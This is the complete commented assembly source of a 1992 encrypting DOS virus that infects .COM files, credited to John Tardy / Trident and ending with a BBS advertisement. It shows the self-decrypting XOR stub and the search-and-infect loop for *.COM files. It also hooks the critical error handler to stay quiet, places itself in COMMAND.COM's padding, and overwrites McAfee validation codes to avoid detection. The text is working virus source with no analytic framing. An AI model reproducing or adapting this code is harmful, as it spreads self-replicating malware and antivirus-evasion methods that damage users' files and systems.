Org 0h ; Generate .BIN file Start: Jmp MainVir ; Jump to decryptor code at EOF Db '*' ; Virus signature (very short) ; ; Decryptor procedure ; MainVir: Call On1 ; Push offset on stack On1: Pop BP ; Calculate virus offset Sub BP,Offset MainVir+3 ; Push Ax ; Save possible error code Lea Si,Crypt[BP] ; Decrypt the virus with a Mov Di,Si ; very simple exclusive or Mov Cx,CryptLen ; function. Decrypt: Lodsb ; Xor Al,0 ; Stosb ; Loop Decrypt ; DecrLen Equ $-MainVir ; Length of the decryptor ; ; Main initialization procedure ; Crypt: Mov Ax,Cs:OrgPrg[BP] ; Store begin of host at Mov Bx,Cs:OrgPrg[BP]+2 ; cs:100h (begin of com) Mov Cs:Start+100h,Ax ; Mov Cs:Start[2]+100h,Bx ; Xor Ax,Ax ; Get original interrupt 24 Push Ax ; (critical error handler) Pop Ds ; Mov Bx,Ds:[4*24h] ; Mov Es,Ds:[4*24h]+4 ; Mov Word Ptr Cs:OldInt24[Bp],Bx ; And store it on a save place Mov Word Ptr Cs:OldInt24+2[Bp],Es ; Lea Bx,NewInt24[Bp] ; Install own critical error Push Cs ; handler to avoid messages Pop Es ; when a disk is write Mov Word Ptr Ds:[4*24h],Bx ; protected and such things Mov Word Ptr Ds:[4*24h]+2,Es ; Push Cs ; Pop Ds ; Mov Ah,30h ; Check if DOS version is Int 21h ; 3.0 or above for correct Cmp Al,3 ; interrupt use Jae NoCLean ; Jmp Ready NoClean: Mov Ah,1ah ; Store DTA at safe place Mov Dx,0fd00h ; Int 21h ; Mov Ah,4eh ; FindFirsFile Function Search: Lea Dx,FileSpec[BP] ; Search for filespec given Xor Cx,Cx ; in FileSpec adress Int 21h ; Jnc Found ; Found - Found Jmp Ready ; Not Found - Ready Found: Mov Ax,4300h ; Get file attributes and Mov Dx,0fd1eh ; store them on the stack Int 21h ; Push Cx ; Mov Ax,4301h ; clear file attributes Xor Cx,Cx ; Int 21h ; Mov Ax,3d02h ; open file with read/write Int 21h ; access Mov Bx,5700h ; save file date/time stamp Xchg Ax,Bx ; on the stack Int 21h ; Push Cx ; Push Dx ; Mov Ah,3fh ; read the first 4 bytes of Lea Dx,OrgPrg[BP] ; the program onto OrgPrg Mov Cx,4 ; Int 21h ; Mov Ax,Cs:[OrgPrg][BP] ; Check if renamed exe-file Cmp Ax,'ZM' ; Je ExeFile ; Cmp Ax,'MZ' ; Check if renamed weird exe- Je ExeFile ; file Mov Ah,Cs:[OrgPrg+3][BP] ; Check if already infected Cmp Ah,'*' ; Jne Infect ; ExeFile: Call Close ; If one of the checks is yes, Mov Ah,4fh ; close file and search next Jmp Search ; file FSeek: Xor Cx,Cx ; subroutine to jump to end Xor Dx,Dx ; or begin of file Int 21h ; Ret ; Infect: Mov Ax,0fd1e[0] ; check if the file is Cmp Ax,'OC' ; COMMAN?.COM (usually result Jne NoCommand ; if COMMAND.COM) Mov Ax,0fd1e[2] ; Cmp Ax,'MM' ; Jne NoCommand ; Mov Ax,0fd1e[4] ; Cmp Ax,'NA' ; Jne NoCommand ; Mov Ax,4202h ; Jump to EOF Call Fseek ; Cmp Ax,0f000h ; Check if file too large Jae ExeFile Cmp Ax,VirS ; Check if file to short jbe ExeFile Sub Ax,VirS Xchg Cx,Dx Mov Dx,4200h Xchg Dx,Ax Mov EOFminVir[BP],Dx Int 21h Mov Ah,3fh Mov Dx,Offset Buffer Mov Cx,VirS Int 21h Cld Mov Si,Offset Buffer Mov Cx,VirLen On5: Push Cx On6: Lodsb Cmp Al,0 Jne On4 Loop On6 On4: Cmp Cx,0 Je Found0 Pop Cx Cmp Si,SeekLen Jb On5 Jmp NoCommand Found0: Pop Cx Sub Si,Offset Buffer Sub Si,Cx Xor Cx,Cx Mov Dx,EOFminVir[BP] Add Dx,Si Mov Ax,4200h Int 21h Jmp CalcVirus EOFminVir Dw 0 NoCommand: Mov Ax,4202h ; jump to EOF Call FSeek ; Cmp Ax,0f000h ; Check if file too large Jb NoExe1 ; if yes, goto exefile Jmp ExeFile ; NoExe1: Cmp Ax,10 ; Check if file too short Ja NoExe2 ; if yes, goto exefile Jmp ExeFile ; NoExe2: Mov Cx,Dx ; calculate pointer to offset Mov Dx,Ax ; EOF-52 (for McAfee validation Sub Dx,52 ; codes) Mov Si,Cx ; move file pointer to the Mov Di,Dx ; calculated address Mov Ax,4200h ; Int 21h ; Mov Ah,3fh ; read the last 52 bytes Mov Dx,0fb00h ; of the file Mov Cx,52 ; Int 21h ; Cmp Ds:0Fb00h,0fdf0h ; check if protected with the Jne Check2 ; AG option Cmp Ds:0fb02h,0aac5h ; Jne Check2 ; Mov Ax,4200h ; yes - let virus overwrite Mov Cx,Si ; the code with itself, so Mov Dx,Di ; the file has no validation Int 21h ; code Jmp CalcVirus ; Check2: Cmp Ds:0Fb00h+42,0fdf0h ; check if protected with the Jne Eof ; AV option Cmp Ds:0Fb02h+42,0aac5h ; Jne Eof ; Mov Ax,4200h ; yes - let virus overwrite Mov Cx,Si ; the code with itself, so Mov Dx,Di ; the file has no validation Add Dx,42 ; code Int 21h ; Jmp CalcVirus ; Eof: Mov Ax,4202h ; not AG or AV - jump to Call Fseek ; EOF CalcVirus: Sub Ax,3 ; calculate the jump for the Mov Cs:CallPtr[BP]+1,Ax ; virus start GetCrypt: Mov Ah,2ch ; get 100s seconds for the Int 21h ; encryption value. Cmp Dl,0 ; if not zero, goto NoZero Jne NoZero ; Jmp GetCrypt ; NoZero: Mov Cs:Decrypt+2[BP],Dl ; Store key into decryptor Lea Si,MainVir[BP] ; Move changed decryptor to Mov Di,0fb00h ; a safe place in memory Mov Cx,DecrLen ; Rep Movsb ; Lea Si,Crypt[BP] ; Encrypt the virus and merge Mov Cx,CryptLen ; it to the changed decryptor Encrypt: Lodsb ; code Xor Al,Dl ; Stosb ; Loop Encrypt ; Mov Ah,40h ; append virus at EOF or over Lea Dx,0fb00h ; the validation code of Mov Cx,VirLen ; McAfee Int 21h ; Mov Ax,4200h ; Jump to BOF Call FSeek ; Mov Ah,40h ; Write Jump at BOF Lea Dx,CallPtr[BP] ; Mov Cx,4 ; Int 21h ; Call Close ; Jump to Close routine Ready: Mov Ah,1ah ; Restore DTA to normal Mov Dx,80h ; offset Int 21h ; Mov Ax,Cs:OldInt24[Bp] ; remove critical error Mov Dx,Cs:OldInt24+2[Bp] ; handler and store the Xor Bx,Bx ; original handler at the Push Bx ; interrupt table Pop Ds ; Mov Ds:[4*24h],Dx ; Mov Ds:[4*24h]+2,Ax ; Push Cs ; Pop Ds ; Pop Ax ; restore possible error code Mov Bx,100h ; nice way to jump to the Push Cs ; begin of the original host Push Bx ; code Retf ; Db ' (C) 1992 John Tardy / Trident ' Close: Pop Si ; why??? Pop Dx ; restore file date/time Pop Cx ; stamp Mov Ax,5701h ; Int 21h ; Mov Ah,3eh ; close file Int 21h ; Mov Ax,4301h ; restore file attributes Pop Cx ; Mov Dx,0fd1eh ; Int 21h ; Push Si ; why??? Ret ; Db 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' Db ' Satan spawn, the Caco-Daemon - Mor(T)alities Death ' ; ; New critical error handler ; NewInt24: Mov Al,3 ; supress any critical error Iret ; messages OldInt24 Dd 0 ; storage place for old int 24 CallPtr Db 0e9h,0,0 ; jump to place at BOF FileSpec Db '*.COM',0 ; filespec and infection marker OrgPrg: Int 20h ; original program Db 'JT' ; CryptLen Equ $-Crypt ; encrypted part length VirLen Equ $-MainVir ; total virus length Buffer Equ 0f040h ; buffer offset VirS Equ VirLen*2 SeekLen Equ Buffer+Virs ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ